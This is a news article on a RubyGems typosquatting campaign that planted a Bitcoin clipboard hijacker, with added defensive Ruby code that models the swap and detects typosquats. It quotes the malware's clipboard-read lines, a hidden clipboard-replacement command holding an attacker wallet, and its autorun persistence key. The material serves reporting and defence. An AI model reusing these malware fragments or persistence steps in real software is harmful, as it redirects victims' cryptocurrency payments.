
Supply-chain attack hits RubyGems repository with 725 malicious packages, Ars Technica

      Doppelgängers –

Bitcoin currency stealer was downloaded thousands of times.

The packages were published in RubyGems, the official channel for distributing programs and code libraries for the Ruby programming language.
Once installed, the packages executed a script that attempted to intercept Bitcoin payments made on Windows devices. Tomislav Maljic, a ReversingLabs threat analyst, wrote in a post:
The script itself is rather simple. First, it creates a new VBScript file with the main malicious loop at the “%PROGRAMDATA%\Microsoft Essentials\Software Essentials.vbs” path. As its persistence mechanism, it then creates a new autorun registry key “HCU\Software\Microsoft\Windows\CurrentVersion\Run\Microsoft Software Essentials.” With this, the malware ensures that it is run every time the system is started or rebooted.
When the “Software Essentials.vbs” malicious script is executed, it starts an infinite loop where it captures the user’s clipboard data with the following lines of code:

    Set objHTML = CreateObject("htmlfile")
    text = objHTML.ParentWindow.ClipboardData.GetData("text")

The script then checks if the clipboard data matches the format of a cryptocurrency wallet address. If it does, it replaces the address with an attacker-controlled one, “1JkU5XdNLji4Ugbb8agEWL1ko5USnNmc”, in a hidden window using the following command:

    WScript.Shell run "C:\Windows\System32\cmd.exe /c echo 1JkU5XdNLji4Ugbb8agEWL1ko5USnNmc | clip", 0

With this, the threat actor is trying to redirect all potential cryptocurrency transactions to their wallet address. At the time of writing this blog, seemingly no transactions were made for this wallet.
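The excerpt above describes the hijacker in two steps: a format check on whatever is in the clipboard, then a swap to the attacker's wallet. The Ruby below is an added example written for this page, not code from the article or from ReversingLabs. It models one pass of the malicious loop and a defender-side check that catches the swap. It assumes Bitcoin address formats (legacy Base58 and Bech32; the excerpt only says "the format of a cryptocurrency wallet address" and never shows its regex), uses the attacker wallet quoted above, and a sample victim address that is constructed for the demo.

```ruby
# Added example (not from the article or the ReversingLabs post): the
# clipboard swap described above, plus a defender-side check for it.
# Assumes Bitcoin address formats; other coins would need their own patterns.

# Attacker wallet quoted in the ReversingLabs excerpt.
ATTACKER_WALLET = "1JkU5XdNLji4Ugbb8agEWL1ko5USnNmc".freeze

# Legacy Base58 addresses: P2PKH starts with "1", P2SH with "3"; Base58 has
# no 0, O, I or l, which is why the character class below skips them.
LEGACY_BTC = /\A[13][a-km-zA-HJ-NP-Z1-9]{25,34}\z/
# Bech32 SegWit addresses ("bc1..."); the 32-symbol alphabet omits 1, b, i, o.
# Covering these goes beyond what the excerpt shows (assumption).
BECH32_BTC = /\Abc1[ac-hj-np-z02-9]{11,71}\z/i

def wallet_address?(text)
  t = text.strip
  t.match?(LEGACY_BTC) || t.match?(BECH32_BTC)
end

# One pass of the malicious loop: the victim's clipboard comes back as the
# attacker's wallet if, and only if, it looked like a wallet address.
def hijack_clipboard(clipboard_text, attacker = ATTACKER_WALLET)
  wallet_address?(clipboard_text) ? attacker : clipboard_text
end

# Defender side. Feed a stream of [:copy, text] (the user put text on the
# clipboard) and [:read, text] (what the clipboard held when read back).
# A read that returns a *different* wallet address than the one last copied
# is the signature of this hijacker: nothing else should rewrite an address
# in place.
def detect_hijack(events)
  last_copied = nil
  alerts = []
  events.each do |kind, text|
    case kind
    when :copy
      last_copied = text
    when :read
      next if last_copied.nil? || text == last_copied
      if wallet_address?(last_copied) && wallet_address?(text)
        alerts << { expected: last_copied, found: text }
      end
    end
  end
  alerts
end

# Constructed demo: a sample victim address, the hijacker's rewrite, and the
# detector catching it.
VICTIM_WALLET = "1BvBMSEYstWetqTFn5Au4m4GFg7xJaNVN2".freeze
if $PROGRAM_NAME == __FILE__
  pasted = hijack_clipboard(VICTIM_WALLET)
  puts "victim copied #{VICTIM_WALLET}, will paste #{pasted}"
  p detect_hijack([[:copy, VICTIM_WALLET], [:read, pasted]])
end
```

The practical lesson is in detect_hijack: a wallet app or a paste handler should compare the address the user copied with the address that is about to be signed, because the hijacker changes only the clipboard, not what the user saw on screen.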

RubyGems maintainers did not respond to an email seeking comment.

The latest of several –

It’s by no means the first time people have used typosquatting to sneak malicious packages into widely used open source repositories. In 2016, a college student uploaded sketchy scripts to RubyGems, PyPi, and NPM, which are community websites for developers of the Ruby, Python, and JavaScript programming languages, respectively. A phone-home feature in the student’s scripts showed that the imposter code was executed tens of thousands of times on thousands of separate domains, and more than half the time his code was given all-powerful administrative rights. Two of the affected domains ended in .mil, an indication that people inside the US military had run his script. Attackers quickly adopted the technique.

In 2018, an attacker sneaked a clipboard hijacker into PyPi. The malicious package was titled “Colourama” and looked similar to Colorama, which is one of the most-downloaded legitimate modules in the Python repository. The malicious package was downloaded 725 times, not including downloads from mirror sites.
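The Colourama/Colorama pair above is a one-character edit; a hyphen swapped for an underscore or a change of case is the other common doppelgänger pattern. The Ruby below is an added example, not code from the article or from RubyGems, PyPI or npm, that audits a dependency list against an allow-list of popular package names and flags names that are one slip away from a known one. The names in POPULAR and the dependency list are a constructed sample; a real check would use the repository's own download ranking.

```ruby
# Added example (not from the article or from any package repository): flag
# dependency names that are one slip away from a well-known package.

# Constructed allow-list of "popular" names for the demo; in practice pull the
# repository's top-N download list.
POPULAR = %w[rails rake nokogiri rspec-core colorama requests].freeze

# Case and the separators -, _ and . are routinely confused in package names,
# so compare with them stripped.
def normalize(name)
  name.downcase.gsub(/[-_.]/, "")
end

# Classic edit distance (insert, delete, substitute each cost 1).
def levenshtein(a, b)
  prev = (0..b.length).to_a
  a.each_char.with_index(1) do |ca, i|
    cur = [i]
    b.each_char.with_index(1) do |cb, j|
      cost = ca == cb ? 0 : 1
      cur << [prev[j] + 1, cur[j - 1] + 1, prev[j - 1] + cost].min
    end
    prev = cur
  end
  prev.last
end

# nil  -> name is itself on the allow-list
# []   -> nothing on the allow-list is close to it
# else -> [[popular_name, reason], ...] it may be impersonating
def typosquat_suspects(name, popular = POPULAR, max_distance: 1)
  return nil if popular.include?(name)
  popular.each_with_object([]) do |legit, out|
    if normalize(legit) == normalize(name)
      out << [legit, "separator/case variant"]
    else
      d = levenshtein(name.downcase, legit.downcase)
      out << [legit, "edit distance #{d}"] if d <= max_distance
    end
  end
end

# Audit a whole dependency list (e.g. the names pulled from a Gemfile.lock or
# requirements.txt); returns only the entries that need a human look.
def audit(dependencies, popular = POPULAR)
  dependencies.each_with_object({}) do |dep, report|
    suspects = typosquat_suspects(dep, popular)
    report[dep] = suspects if suspects && !suspects.empty?
  end
end

if $PROGRAM_NAME == __FILE__
  # Constructed dependency list: two legitimate names, two lookalikes.
  audit(%w[rails colourama rspec_core nokogiri]).each do |dep, suspects|
    suspects.each { |legit, why| puts "#{dep}: resembles #{legit} (#{why})" }
  end
end
```

Run this against every new dependency in CI, before install scripts get a chance to execute: the point of a typosquat is that the malicious code runs at install time, so a check after installation is too late.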

A month later, attackers managed to pull off an even more impressive feat when they sneaked a bitcoin-stealing backdoor into the event-stream library.

The college student’s 2016 experiment, and the booby-trapping of the legitimate event-stream library, demonstrate that supply-chain attacks against open source repositories can be an effective way to get malicious code executed on sensitive machines. This year’s event with RubyGems shows that these supply-chain attacks aren’t going away any time soon.
